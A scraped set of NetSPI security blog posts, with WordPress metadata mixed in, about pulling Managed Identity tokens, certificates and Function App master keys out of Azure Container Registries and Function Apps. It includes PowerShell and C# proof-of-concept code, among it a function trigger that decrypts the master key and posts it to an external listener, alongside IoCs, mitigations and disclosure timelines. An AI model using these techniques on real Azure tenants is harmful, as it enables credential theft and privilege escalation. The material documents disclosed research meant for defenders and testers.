- Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once

- By default, the function generates tokens for the "Management" (https://management.azure.com/) service

- If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter.

- Two commonly used options:

- https://graph.microsoft.com/ - Used for accessing the Graph API

- https://vault.azure.net – Used for accessing the Key Vault API

- The Output is a Data Table Object that can be assigned to a variable

- $tokens = Invoke-AzACRTokenGenerator

- This can also be appended with a "+=" to add tokens to the object

- This is handy for storing multiple token scopes (Management, Graph, Vault) in one object

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session:

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1

Once imported, the function is simple to use:

Invoke-AzACRTokenGenerator -Verbose

Example Output:

Indicators of Compromise (IoCs)

To better support the defenders out there, we've included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack.

| Operation Name | Description |

|---|---|

| Microsoft.ContainerRegistry/registries/tasks/write | Create or update a task for a container registry. |

| Microsoft.ContainerRegistry/registries/scheduleRun/action | Schedule a run against a container registry. |

| Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action | Get the log SAS URL for a run. |

| Microsoft.ContainerRegistry/registries/tasks/delete | Delete a task for a container registry. |
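As a rough illustration of how the operation names in the table could be used, the sketch below filters a list of activity log entries for those four operations. The entry shape is an assumption: it expects each entry to be a dictionary with an `operationName` field that is either a plain string or an object with a `value` key. The function names are hypothetical and are not part of MicroBurst.

```python
# Operation names copied from the IoC table above, compared case-insensitively.
ACR_TASK_IOC_OPERATIONS = {
    name.lower()
    for name in (
        "Microsoft.ContainerRegistry/registries/tasks/write",
        "Microsoft.ContainerRegistry/registries/scheduleRun/action",
        "Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action",
        "Microsoft.ContainerRegistry/registries/tasks/delete",
    )
}


def operation_name(entry):
    """Return the operation name from one log entry (assumed entry shape)."""
    value = entry.get("operationName", "")
    # Assumption: some exports nest the name as {"value": ...}, others use a string.
    if isinstance(value, dict):
        value = value.get("value", "")
    return value or ""


def find_acr_task_events(entries):
    """Keep only the entries whose operation matches one of the IoCs."""
    return [e for e in entries if operation_name(e).lower() in ACR_TASK_IOC_OPERATIONS]
```

A task write, a scheduled run, a log SAS URL request, and a task delete from the same caller in a short window would be a reasonable sequence to alert on, since that mirrors the create, run, read, and clean up steps described in this post.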

Conclusion

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above.

[post_title] => Automating Managed Identity Token Extraction in Azure Container Registries [post_excerpt] => Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-managed-identity-token-extraction-in-azure-container-registries [to_ping] => [pinged] => [post_modified] => 2024-01-03 15:13:38 [post_modified_gmt] => 2024-01-03 21:13:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31693 [menu_order] => 25 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 31440 [post_author] => 10 [post_date] => 2023-11-16 09:00:00 [post_date_gmt] => 2023-11-16 15:00:00 [post_content] =>

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized.

TL;DR

- The Linux containers in Azure Function Apps utilize an encrypted startup context file hosted in Azure Storage Accounts

- The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container

- This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of November 11, 2023, this issue has been fully addressed by Microsoft.





In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App.

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.



Here is the PowerShell sample code that we started with:

using namespace System.Net

# Input bindings are passed in via param block.

param($Request, $TriggerMetadata)



$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".")

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY)

$iv = [System.Convert]::FromBase64String($encryptedContext[0])

$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1])

$aes = [System.Security.Cryptography.AesManaged]::new()

$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC

$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7

$aes.Key = $key

$aes.IV = $iv

$decryptor = $aes.CreateDecryptor()

$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)

$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes)

$body = $plainText

# Associate values to output bindings by calling 'Push-OutputBinding'.

Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{

StatusCode = [HttpStatusCode]::OK

Body = $body

})

At a high level, this PowerShell code reads the SAS-tokened URL from its environmental variable and downloads the encrypted context into a variable. We then set the decryption key from the corresponding environmental variable, take the IV from the first section of the encrypted context, and complete the AES decryption, returning the fully decrypted context in the HTTP response.
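To make the layout of the encrypted context a little more concrete, here is a minimal Python sketch of the parsing step only. It mirrors how the PowerShell above treats the value: a string split on ".", with the first section as the Base64 IV and the second as the Base64 ciphertext. It deliberately stops before decryption, because the Python standard library has no AES implementation. The function name and the sanity checks are our own additions for illustration.

```python
import base64


def split_encrypted_context(encrypted_context):
    """Split '<base64 IV>.<base64 ciphertext>[...]' into raw IV and ciphertext bytes."""
    parts = encrypted_context.split(".")
    if len(parts) < 2:
        raise ValueError("expected at least '<iv>.<ciphertext>'")
    iv = base64.b64decode(parts[0])
    ciphertext = base64.b64decode(parts[1])
    # AES-CBC uses a 16-byte IV and a ciphertext that is a multiple of the block size.
    if len(iv) != 16:
        raise ValueError("IV is not 16 bytes")
    if len(ciphertext) == 0 or len(ciphertext) % 16 != 0:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return iv, ciphertext


# Synthetic example value, not real Function App data.
example_iv = bytes(range(16))
example_ciphertext = bytes(32)
example_context = ".".join(
    base64.b64encode(chunk).decode("ascii")
    for chunk in (example_iv, example_ciphertext)
)
iv, ciphertext = split_encrypted_context(example_context)
print(len(iv), len(ciphertext))
```

The returned bytes are what would be handed to an AES-CBC decryptor with PKCS7 padding, along with the Base64-decoded CONTAINER_ENCRYPTION_KEY value.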



When building this code, we used an existing Function App in our subscription that had a Managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed a “MSISpecializationPayload” section of the configuration, which we had not looked at before, that contained a list of Identities attached to the Function App.

"MSISpecializationPayload": {

"SiteName": "notarealfunctionapp",

"MSISecret": "57[REDACTED]F9",

"Identities": [

{

"Type": "SystemAssigned",

"ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c",

"TenantId": "[REDACTED]",

"Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A",

"SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/",

"ResourceId": "",

"Certificate": "MIIK[REDACTED]H0A==",

"PrincipalId": "[REDACTED]",

"AuthenticationEndpoint": null

},

{

"Type": "UserAssigned",

"ClientId": "[REDACTED]",

"TenantId": "[REDACTED]",

"Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31",

"SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]",

"ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]",

"Certificate": "MIIK[REDACTED]0A==",

"PrincipalId": "[REDACTED]",

"AuthenticationEndpoint": null

}

],

[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.

$b64 = " MIIK[REDACTED]H0A=="

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))
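For Function Apps with several identities attached, the same decode step can be looped. The sketch below is a hedged Python equivalent that walks the "Identities" list and decodes each "Certificate" value. It assumes "MSISpecializationPayload" sits at the top level of the decrypted context JSON, which the truncated sample above does not confirm, and the function name is hypothetical.

```python
import base64
import json


def extract_identity_certificates(context):
    """Return type, client ID, thumbprint, and decoded PFX bytes per identity."""
    # Assumption: the payload is a top-level key of the decrypted context.
    payload = context.get("MSISpecializationPayload") or {}
    results = []
    for identity in payload.get("Identities", []):
        cert_b64 = (identity.get("Certificate") or "").strip()
        if not cert_b64:
            continue
        results.append({
            "type": identity.get("Type"),
            # The sample output shows stray whitespace in ClientId, so strip it.
            "client_id": (identity.get("ClientId") or "").strip(),
            "thumbprint": identity.get("Thumbprint"),
            "pfx_bytes": base64.b64decode(cert_b64),
        })
    return results


# Synthetic context with placeholder certificate data, not a real PFX.
example_context = json.loads(json.dumps({
    "MSISpecializationPayload": {
        "SiteName": "notarealfunctionapp",
        "Identities": [
            {
                "Type": "SystemAssigned",
                "ClientId": " 00000000-0000-0000-0000-000000000000",
                "Thumbprint": "PLACEHOLDER",
                "Certificate": base64.b64encode(b"placeholder pfx bytes").decode("ascii"),
            },
            {"Type": "UserAssigned", "ClientId": "11111111-1111-1111-1111-111111111111", "Certificate": ""},
        ],
    }
}))
certificates = extract_identity_certificates(example_context)
```

Each `pfx_bytes` value could then be written to its own `.pfx` file, named by thumbprint, in the same way as the single-certificate PowerShell example.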



We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).





After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account                              SubscriptionName TenantId   Environment
-------                              ---------------- --------   -----------
b1abdc5c-3e68-476a-9191-428c1300c50c Research         [REDACTED] AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, and we highlighted a few of them in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

- 7/12/23 – Initial discovery of the issue and filing of the report with MSRC

- 7/13/23 – MSRC opens Case 80917 to manage the issue

- 8/02/23 – NetSPI requests update on status of the issue

- 8/03/23 – Microsoft closes the case and issues the following response:

Hi Karl,

Thank you for your patience.

MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.

The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.

As such, this case is being closed.

Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!

- 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue

- 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets

- 9/11/23 – Follow-up email with MSRC confirms the fix is in progress

- 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It's unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App.

Prior Research Note:

While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.



At Black Hat, NetSPI VP of Research Karl Fosaaen sat down with the host of the Cloud Security Podcast Ashish Rajan to discuss all things Azure penetration testing.

During the conversation, he addressed unique challenges associated with conducting penetration tests on web applications hosted within the Azure Cloud. He also provided valuable insights into the specialized skills required for effective penetration testing in Azure environments.

Contrary to common misconceptions, cloud penetration testing in Microsoft Azure is far more complex than a mere configuration review, a misconception that extends to other cloud providers like AWS and Google Cloud as well. In this video, Karl addresses several important questions and methodologies, clarifying the distinct nature of penetration testing within the Azure ecosystem.

Watch the video: https://youtu.be/Y0BkXKthQ5c





[post_title] => Azure Cloud Security Pentesting Skills [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-security-pentesting-skills [to_ping] => [pinged] => [post_modified] => 2023-10-11 18:05:51 [post_modified_gmt] => 2023-10-11 23:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31226 [menu_order] => 13 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 31207 [post_author] => 10 [post_date] => 2023-10-10 13:30:47 [post_date_gmt] => 2023-10-10 18:30:47 [post_content] =>

Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we've taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach.

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful.

A Fresh Approach

In response to this, we've reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we've infused a new approach that includes:

- Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience.

- Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice.

- Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience.

- Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional.

- Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500.

What is DSO?

DSO 1: Malware Dev Training

- Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures.

DSO 2: Adversary Simulation Training

- Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology.

DSO Azure: Azure Cloud Pentesting Training

- Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure.

Join us on this journey of continuous learning, where we're committed to supporting you every step of the way.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape.

[post_title] => NetSPI's Dark Side Ops Courses: Evolving Cybersecurity Excellence [post_excerpt] => Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-side-ops-courses-evolving-cybersecurity-excellence [to_ping] => [pinged] => [post_modified] => 2024-04-02 08:53:52 [post_modified_gmt] => 2024-04-02 13:53:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31207 [menu_order] => 56 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 30784 [post_author] => 37 [post_date] => 2023-08-12 13:30:00 [post_date_gmt] => 2023-08-12 18:30:00 [post_content] =>

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.





Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account.

TL;DR

- Function App Access Keys can be stored in Storage Account containers in an encrypted format

- Access Keys can be decrypted within the Function App container AND offline

- Works with Windows or Linux, with any runtime stack

- Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json).

Previous Research

- Rogier Dijkman – Privilege Escalation via storage accounts

- Roi Nisimi – From listKeys to Glory: How We Achieved a Subscription Privilege Escalation and RCE by Abusing Azure Storage Account Keys

- Bill Ben Haim & Zur Ulianitzky – 10 ways of gaining control over Azure function Apps

- Andy Robbins – Abusing Azure App Service Managed Identity Assignments

- MSRC – Best practices regarding Azure Storage Keys, Azure Functions, and Azure Role Based Access

Requirements

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover.





Required Permissions

- Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”)

- Permission to write to Azure File Shares hosting Function code

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{

"masterKey": {

"name": "master",

"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA",

"encrypted": true

},

"functionKeys": [

{

"name": "default",

"value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q",

"encrypted": true

}

],

"systemKeys": [],

"hostName": "thisisafakefunctionappprobably.azurewebsites.net",

"instanceId": "dc[TRUNCATED]c3",

"source": "runtime",

"decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"





}The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure:

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share.

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable.
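Before moving on to decryption, it can help to enumerate which values in a retrieved host.json are actually encrypted. The Python sketch below does that for the layout shown earlier (masterKey, functionKeys, systemKeys, each with name, value, and encrypted fields). The function name is hypothetical and the sample document uses the same truncated placeholder values as the post.

```python
import json


def list_encrypted_keys(host_json_text):
    """List every key in a host.json document whose 'encrypted' flag is true."""
    doc = json.loads(host_json_text)
    candidates = []
    master = doc.get("masterKey")
    if master:
        candidates.append(("masterKey", master))
    for kind in ("functionKeys", "systemKeys"):
        for key in doc.get(kind) or []:
            candidates.append((kind, key))
    return [
        {"kind": kind, "name": key.get("name"), "value": key.get("value")}
        for kind, key in candidates
        if key.get("encrypted")
    ]


# Placeholder document following the structure shown above; values stay truncated.
example_host_json = """
{
  "masterKey": {"name": "master", "value": "CfDJ8[TRUNCATED]IA", "encrypted": true},
  "functionKeys": [
    {"name": "default", "value": "CfDJ8[TRUNCATED]8Q", "encrypted": true},
    {"name": "cleartext-example", "value": "not-encrypted", "encrypted": false}
  ],
  "systemKeys": [],
  "source": "runtime"
}
"""
encrypted_keys = list_encrypted_keys(example_host_json)
for key in encrypted_keys:
    print(key["kind"], key["name"])
```

Any key with "encrypted" set to false is already usable as-is, so only the entries returned here need the decryption steps that follow.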

Decryption in the Function container

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering.

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener.

#r "Newtonsoft.Json"

using Microsoft.AspNetCore.DataProtection;

using Microsoft.Azure.Web.DataProtection;

using System.Net.Http;

using System.Text;

using System.Net;

using Microsoft.AspNetCore.Mvc;

using Microsoft.Extensions.Primitives;

using Newtonsoft.Json;

private static HttpClient httpClient = new HttpClient();

public static async Task<IActionResult> Run(HttpRequest req, ILogger log)

{

log.LogInformation("C# HTTP trigger function processed a request.");

DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter();

string keyname = "master";

string encval = "Cf[TRUNCATED]NQ";

var ikey = new Key(keyname, encval, true);

if (ikey.IsEncrypted)

{

ikey = converter.ReadValue(ikey);

}

// log.LogInformation(ikey.Value);



string url = "https://[TRUNCATED]";

string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}";

var response = await httpClient.PostAsync(url, new StringContent(body.ToString()));

string name = req.Query["name"];

string requestBody = await new StreamReader(req.Body).ReadToEndAsync();

dynamic data = JsonConvert.DeserializeObject(requestBody);

name = name ?? data?.name;

string responseMessage = string.IsNullOrEmpty(name)



? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."

: $"Hello, {name}. This HTTP triggered function executed successfully.";

return new OkObjectResult(responseMessage);

}

class DataProtectionKeyValueConverter

{

private readonly IDataProtector _dataProtector;

public DataProtectionKeyValueConverter()

{

var provider = DataProtectionProvider.CreateAzureDataProtector();

_dataProtector = provider.CreateProtector("function-secrets");

}

public Key ReadValue(Key key)

{

var resultKey = new Key(key.Name, null, false);

resultKey.Value = _dataProtector.Unprotect(key.Value);

return resultKey;

}

}

class Key

{

public Key(){}

public Key(string name, string value, bool encrypted)

{

Name = name;

Value = value;

IsEncrypted = encrypted;

}

[JsonProperty(PropertyName = "name")]

public string Name { get; set; }

[JsonProperty(PropertyName = "value")]

public string Value { get; set; }

[JsonProperty(PropertyName = "encrypted")]

public bool IsEncrypted { get; set; }

}Triggering via browser:

Burp Collaborator:

Master key:

Local Decryption

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.



One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment:

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint.
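Since the variable name depends on the underlying operating system, trigger code that should work in either case can simply check both names. Here is a minimal Python sketch of that lookup, for a Function App using the Python runtime. The helper name is hypothetical, and it checks AzureWebEncryptionKey first only because that is the default noted above.

```python
import os

# The two variable names discussed above, default first.
CANDIDATE_VARIABLES = ("AzureWebEncryptionKey", "MACHINEKEY_DecryptionKey")


def find_decryption_key(environ=None):
    """Return (variable name, value) for the first decryption key variable that is set."""
    environ = os.environ if environ is None else environ
    for name in CANDIDATE_VARIABLES:
        value = environ.get(name)
        if value:
            return name, value
    return None


# Placeholder environments for illustration; real values come from the container.
linux_like = {"AzureWebEncryptionKey": "placeholder-linux-key"}
windows_like = {"MACHINEKEY_DecryptionKey": "placeholder-windows-key"}
print(find_decryption_key(linux_like))
print(find_decryption_key(windows_like))
```

Calling `find_decryption_key()` with no arguments reads the live process environment, which is what a deployed trigger would do.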

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved.

// Licensed under the MIT License. See License.txt in the project root for license information.

using System;

using Microsoft.Azure.Web.DataProtection;

using Microsoft.AspNetCore.DataProtection;

using Xunit;

using System.Diagnostics;

using System.IO;

namespace Microsoft.Azure.Web.DataProtection.Tests

{

public class DataProtectionProviderTests

{

[Fact]

public void EncryptedValue_CanBeDecrypted()

{

using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B"))

{

var provider = DataProtectionProvider.CreateAzureDataProtector(null, true);

var protector = provider.CreateProtector("function-secrets");

string expected = "test string";

// string encrypted = protector.Protect(expected);

string encrypted = "Cf[TRUNCATED]8w";

string result = protector.Unprotect(encrypted);

File.WriteAllText("test.txt", result);

Assert.Equal(expected, result);

}

}

}

}

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs.
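As a hedged example of that last step, the sketch below builds (but does not send) a request to the Function host status endpoint, passing the decrypted master key in the `x-functions-key` header. The `/admin/host/status` path and the header name reflect our understanding of the Functions host admin API and should be verified against current Microsoft documentation. The hostname is the placeholder from the host.json sample, and the function name is hypothetical.

```python
import urllib.request


def build_host_status_request(hostname, master_key):
    """Build a GET request for the host status endpoint, authenticated with the master key."""
    # Assumption: admin endpoints live under /admin and accept the x-functions-key header.
    url = f"https://{hostname}/admin/host/status"
    return urllib.request.Request(
        url,
        headers={"x-functions-key": master_key},
        method="GET",
    )


request = build_host_status_request(
    "thisisafakefunctionappprobably.azurewebsites.net",
    "decrypted-master-key-placeholder",
)
print(request.get_method(), request.full_url)
# To actually send it: urllib.request.urlopen(request, timeout=10)
```

The request is only constructed here so the example stays side-effect free. Sending it against a real Function App should only be done with authorization.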

Tool Overview

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.



Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

See the GitHub link https://github.com/NetSPI/FuncoPop for more info.

Prevention and Mitigation

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes:

- Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.

- Rotating Shared Access Keys.

- Limiting the creation of privileged, long-lasting SAS tokens.

- Applying the principle of least privilege: grant only the privileges necessary, at the narrowest scope possible. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!).

- Identifying Function Apps that use Storage Accounts and ensuring that these resources are placed in dedicated Resource Groups.

- Avoiding the use of shared Storage Accounts for multiple Functions.

- Ensuring that Diagnostic Settings are in place to collect audit and data plane logs.

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations.

- https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations?tabs=azure-cli#important-considerations

- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#restrict-your-storage-account-to-a-virtual-network

- https://learn.microsoft.com/en-us/azure/azure-functions/functions-networking-options?tabs=azure-cli#use-key-vault-references

- https://learn.microsoft.com/en-us/azure/azure-functions/security-concepts?tabs=v4

MSRC Timeline

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything.

02/08/2023 - Initial report created

02/13/2023 - Case closed as expected and documented behavior

03/08/2023 - Second report created

04/25/2023 - MSRC confirms original assessment as expected and documented behavior

08/12/2023 - DefCon Cloud Village presentation

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection.



